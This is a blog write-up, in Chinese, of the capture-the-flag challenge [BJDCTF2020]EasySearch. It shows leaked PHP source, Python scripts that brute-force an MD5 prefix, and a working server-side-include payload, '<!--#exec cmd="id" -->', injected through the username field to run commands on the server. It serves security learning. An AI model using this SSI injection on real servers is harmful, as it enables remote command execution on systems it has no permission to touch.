BUUCTF:[BJDCTF2020]EasySearch

最新推荐文章于 2023-05-03 16:12:43 发布
最新推荐文章于 2023-05-03 16:12:43 发布
阅读量637 收藏 1
点赞数 2
分类专栏: CTF_WEB_Writeup 文章标签: BUUCTF BJDCTF2020
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/127183460
版权

在这里插入图片描述
index.php.swp发现源码

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

首先验证password,然后username的值可控,但是写入.shtml文件,无法控制这个$file_html,查阅.shtml文件

在这里插入图片描述
可以看到.shtml文件可以执行命令,格式:

<!--#exec cmd="id" -->

验证password脚本简单跑一下即可

import hashlib

chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
for c1 in chars:
	for c2 in chars:
		for c3 in chars:
			for c4 in chars:
				res = c1 + c2 + c3 + c4
				md5_res = hashlib.md5(res.encode()).hexdigest()
				if md5_res[0:6] == '6d0bc1':
					print('{} {}'.format(res, md5_res))

或者用数字更快

import hashlib

for n in range(10000000):
	md5_n = hashlib.md5(str(n).encode()).hexdigest()
	if md5_n[0:6] == '6d0bc1':
		print('{} {}'.format(n, md5_n))

PS C:\Users\Administrator\Downloads> python .\code.py
2020666 6d0bc1153791aa2b4e18b4f344f26ab4
2305004 6d0bc1ec71a9b814677b85e3ac9c3d40
9162671 6d0bc11ea877b37d694b38ba8a45b19c
RhPd 6d0bc1e4a7920842ccce734925903e17

payload

username=<!--#exec cmd="id" -->&password=RhPd

运行之后在响应头反馈了访问URL

在这里插入图片描述
访问即可发现成功执行
在这里插入图片描述
在当前目录的上一级发现flag

在这里插入图片描述
直接读取即可

在这里插入图片描述

末 初
关注
专栏目录
BUUCTF web [BJDCTF2020]EasySearch wp
Whaocai的博客
08-02 329
考点 ①ssi注入 进去之后是一个登录框,猜测有没有register.php,经过测试也不存在sql注入。直接御剑扫描(扫buuctf上的题要调线程和超时,我是线程10超时15,不然会被平台禁掉)。扫出来了index.php.swp index.php.swp源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$
BUUCTF [BJDCTF2020]Easy MD51 解析WP
最新发布
m0_73615178的博客
01-07 1252
首先,看题有个文本框和一个提交按钮,那么大致注入点从注入框下手,随意输入一个值,通过抓包和分析网址得出,传参方式为GET方式,后端判断语句为sql语句“select * from 'admin' where password=md5($pass,true)”,其中利用散列函数md5加密了password。MD5函数介绍, 语法:md5(string,raw),其中string要计算的字符串,raw(可选)规定十六进制或二进制输出格式true为原始16字符二进制格式,默认false32字符16进制格式。
BUUCTF [BJDCTF2020]EasySearch
qq_53863234的博客
12-05 2887
Apache SSI 远程命令执行漏洞
web buuctf [BJDCTF2020]EasySearch
weixin_44214568的博客
04-12 564
知识点:Apache SSI漏洞 Apache安全漏洞_0ak1ey的博客-CSDN博客_apache漏洞 Apache SSI远程命令执行漏洞_0ak1ey的博客-CSDN博客_apache命令执行漏洞 Apache SSI 远程命令执行漏洞 - MCY5 - 博客园 1.开题: 看到题目的时候,我就准备用dirsearch扫描,但是没有扫描出来,我又御剑扫了一遍,第一遍没扫出来,我把线程改成1才扫出来的, 2.贴源码 <?php ob_start(); functio.
BUUCTF-WEB 【BJDCTF2020EasySearch 1
qq_36410265的博客
02-08 371
SSI(服务端包含)
buuCTF [BJDCTF2020]EasySearch 1
weixin_45642610的博客
04-14 1721
buuCTF [BJDCTF2020]EasySearch 1 进去后是这样 扫后台发现index.php.swp备份。 这里吐槽一下。我用dirsearch扫了3次都没出来,最后用dirmap指定字典才出来。网上的字典大部分没包含index.php.swp的,还要自己添加到字典里。 要求password的md5值的前6个字符为6d0bc1。敲代码(python): from hashlib import md5 for i in range(10000000): if md5(str(i).
buuctf [BJDCTF2020]Easy MD5 1
qq_44122254的博客
11-30 510
打开靶场链接,看见一个输入框, 题目上面有说明这个是MD5方向的解题思路,先去学习一波,搜索md5绕过,以及相关的函数,进行学习一下,现在继续回到题目上。抓包发现只有一个select 查询,hint指向md5,这时候可以学习一下,MD5绕过函数,md5($pass,true) ffifdyop这个函数,输入查询 查看源码,发现了一段代码:<!– $a = $GET[‘a’]; $b = $_GET[‘b’]; if($a != KaTeX parse error: Expected 'EOF',
BUUCTF:bjdctf_2020_babyrop2(write up)
qq_44768749的博客
08-26 927
BUUCTF:bjdctf_2020_babyrop20x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,开启栈不可执行、canary、部分RELRO保护 0x02 运行 输入两次字符串 0x03 IDA main函数 调用了下面三个函数 init函数 初始化,输出提示 gift函数 存在格式化字符串漏洞 vuln函数 存在栈溢出漏洞 0x04 思路 开启canary保护 可利用gift函数
BUUCTF:bjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1598
BUUCTF:bjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
buuctf-[BJDCTF2020]ZJCTF,不过如此
qq_42728977的博客
12-26 2371
[BJDCTF2020]ZJCTF,不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
BUUCTF_Crypto_[BJDCTF2020]RSA
qq_58370970的博客
12-01 408
题目:给了一个py文件 可以看出两个n具有相同的q,可以通过求两个n的最大公约数得到q,再通过n/q求出p 给了e的范围和对应的c1=pow(294,e,n)可以爆破求出e 代码: import gmpy2 import libnum c1=1264163561780374615033223264635459629270786148020020753719914118362443830375712057009674124802023666696575579800965654773861639.
---------已搬运-------BUUCTF:[BJDCTF2020]EasySearch ----- ssi注入漏洞
Zero_Adam的博客
02-25 319
目录:一、自己做:二、不足&&学到的三、学习WP 一、自己做: 二、不足&&学到的 三、学习WP
[BJDCTF2020]RSA ==>低加密指数攻击
LYJ20010728的博客
12-01 806
题目地址 task.py内容如下: from Crypto.Util.number import getPrime,bytes_to_long flag=open("flag","rb").read() p=getPrime(1024) q=getPrime(1024) assert(e<100000) n=p*q m=bytes_to_long(flag) c=pow(m,e,n) print c,n print pow(294,e,n) p=getPrime(1024) n=p*q m=by
[BJDCTF2020]rsa_output
2er0!=O的博客
05-26 854
[BJDCTF2020]rsa_output {2105833933735428784753410754461360530501544109050892409419881669121910339952680011280241638308899525390885746026672692561582689530337780161482936403462447519585999794314630558831593913077745048519629076624961234005435462251620768154
BUUCTF Crypto [BJDCTF2020]RSA
weixin_52529261的博客
05-03 505
而且两次n(即n1和n2)是同一个q,两次的p是不同的。首先从pow(294,e,n1)入手,得e(e
[BJDCTF2020]EasySearch1
qq_45829213的博客
01-26 2987
buuctf 源码泄露 ssi远程命令执行漏洞
BUUCTF Crypto [BJDCTF2020]RSA wp
hsqGOD's blog
03-20 2218
看完这道题的加密脚本,发现这道题给出的条件异乎寻常的多,但是我们不管他,需要什么就调用什么。我们先可以看到,两个n值公用了一个q,可以通过gcd函数很快找到q的值,就可以求出两个p的值,然后我们发现我们不知道e的值,然后e小于100000,又有关系式output=pow(294,e,n),可以通过爆破e的取值很快得到e,至此我们以及具有了解除flag的所有条件,不管其他条件直接写脚本,如下 // ...
BUUCTF Crypto [BJDCTF2020]rsa_output wp
hsqGOD's blog
03-19 1953
不多说,RSA共模攻击,脚本如下 // python2 from gmpy2 import invert def gongmogongji(n, c1, c2, e1, e2): def egcd(a, b): if b == 0: return a, 0 else: x, y = egcd(b, a % b)...
buuctf ACTF2020 Include
09-16
根据提供的引用内容,buuctf ACTF2020的Include功能可能存在文件包含漏洞。通过将URL中的参数修改为"?file=php://filter/convert.base64-encode/resource=flag.php",可以尝试读取flag.php文件并将其内容以Base64编码形式返回。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值